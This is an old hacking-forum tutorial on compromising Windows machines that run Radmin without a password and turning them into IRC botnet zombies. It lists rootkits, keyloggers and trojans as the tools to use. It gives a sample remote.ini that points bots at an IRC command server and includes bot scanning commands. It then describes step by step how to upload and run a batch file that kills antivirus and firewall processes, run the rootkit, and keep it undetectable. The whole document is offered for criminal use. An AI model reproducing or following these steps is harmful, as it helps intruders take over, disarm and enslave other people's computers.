Tutorial on hacking with Radmin From Darkteam


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3 yrs. 4 mth. 13 days
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Hacking With Radmin. The Basic's..

Ok, now im firstly going to say is that i will NOT be posting any links to any files that you need to hack with radmin.
As i feel it will make you better yourself if you can find them yourself. I can always point you in the right direction as i will do on this tutorial.

Step 1:

We're going to have to get our tools of the trade.. here is the tools you will need in no particular order.

Rootkit (This may be a Scan kit, Iroffer kit, keylogger,Trojan ect ect. )
A list of ips. ( more will be explained on how to get these later.
A IRC Client Such as mIRC if your using windows.
A server where you can keep some scan bots on, and or xdcc iroffer bots.
A channel in which you will keep your zombies.
A Good way of passwording your radmin bots.. this can be done using bat files, that will automatically password/delete the batch file that you have used.

Step 2:

Install your Radmin.
Install mIRC.
Find yourself a server to use.
Find yourself a channel to use also. Make this room +s +m +k if possible. ( +s = Secret +m = Moderated +k = Key )
Now register your room.

Step 3:

Now we are going to find some Radmin ips.

Now There is various ways of doing this, You could always make your own radmin scankit. ( This Displays Rootable IP's) Or you can find some on various diffrent websites/ips or friends and such like. I won't go into this as this will be something you can figure out for yourself, lots of us have and lots of us know how easy it is to find some radmin kits.

Now, once you've got your radmin kits..

You will need to edit the remote.ini file. ( Remote.ini file is the file in which it tells the rootkit where to connect to and join ect ect. )

n0=%auto #H4x0r3d
n1=%bnc.pass 2005
n2=%bnc.port 2004
n3=%bot.nick 1
n4=%drop f7s2blnf2g6yndr1w5wtn
n5=%drop z6b6ctio1i2sebx5k0kkv
n6=%drop.chan #H4x0r3d
n7=%drop.inc 665
n9=%drop.lines 664
n10=%drop.times 1500
n11=%find.files 0
n12=%find.inc 1
n13=%find.text metallica
n15=%http.inc1 10
n16=%http.inc2 38
n17=%http.inc3 1
n18=%http.range 208
n20=%key H4x0r3dB4By
n21=%mp3chan #H4x0r3d
n22=%mp3inc 75
n23=%mp3length 19846.21
n24=%mp3s 75
n25=%mp3size 425.53
n26=%nopass 1 0 0 0 37 2 0 0 16 8 0 0 2 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
n27=%nopass1 1 0 0 0 37 10 0 1 16 8 1 0 10 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
n28=%online 8268703
n29=%open 8267968
n30=%rb_size 20
n32=%scan.inc1 37
n33=%scan.inc2 102
n34=%scan.inc3 1
n35=%scan.range 128
n36=%server irc.h4x0r3d.net
n37=%sock v2q5gbxm7u3eji

A Typical Remote.ini file looks something simular to this.

As you can see, it tells the rootkit which server to connect to ect ect.

Now, this can be the tricky bit..

Once you've found your radmin rootkit, and you've updated the remote.ini file, you will need to find a ip to put this bot on.. this can be done many diffrent ways, you could idle in someones channel and wait for ips, or use a botnet or whatever else you would like to do..

Now, once you have a bot in..

You will need to learn the commands.

Most Radmin rootkit's that i have seen use these commands.

!iis botnick scan 211

That command will make the bot scan the range of 211, ( Please note you will have to change botnick to the name of your bot.)

Also, some bots use this command .randomb 211

This will make all the bots scan the range of 211.

Ok, now thats the basics of that and it should get you some ips. (Hopefully)

Now, once you've got a password it should look something like this.

[11:33:am]<Sc4nn4332> No Password: 211.342.11.16

Now, we copy 211.342.11.16 and we enter it into radmin, and then we right click the ip ( in radmin ) and go to telnet, and then we do the same thing and we go to file transfer.

Once telnet is open we type cd c:\windows\system32\dllcache or cd c:\winnt\system32\dllcache ect depending on which version of windows its running, this can vary, as it make be on the d:\ drive ect ect..

Anyways, back to the topic in hand.

Now, your telnet window should tell you that your in c\windows\system32\dllcache\ or c:\winnt\system32\dllcache.

Now we need to send the root kit, so first of all if your rootkit isn't detectable you can just send that over with out a problem.

But if your rootkit is detectable then you will need to send a .bat file over to kill the running Antivirus/firewall processes.

Ok for example if your .bat file is called antivirus.bat once it's sent you would type antivirus.bat and then wait for it to scroll down the screen until it has finished.

Then, we go back to Filetransfer to send another file. This will be your rootkit again, if its not detectable then skip this stage but if it is detectable then run your antivirus.bat again if you wish.

Now, once you've sent over your rootkit, just as an example we will call it Antivirus1.exe

Now, once that has sent, you open up telnet again and you type Antivirus1.exe

and then it should look something like this.


if you get any errors this could be multiple things, and i won't cover them in this tutorial.

Once that has done..

go back onto mIRC or which ever client you are using, and then check your channel to see if the bot has joined..

if it has then it's all good, make that bot scan a range of your choice..

I'd advise to make your kit 100% undetectable, and also scan other ips such as VNC Nt ect ect, Although these can be found on diffrent ips.

Hope this helps, it's take a long time to type up so don't complain!

If you like this please rep me

This tutorial was written by Codine, if you are going to use this on your website/forum please give credits to me.
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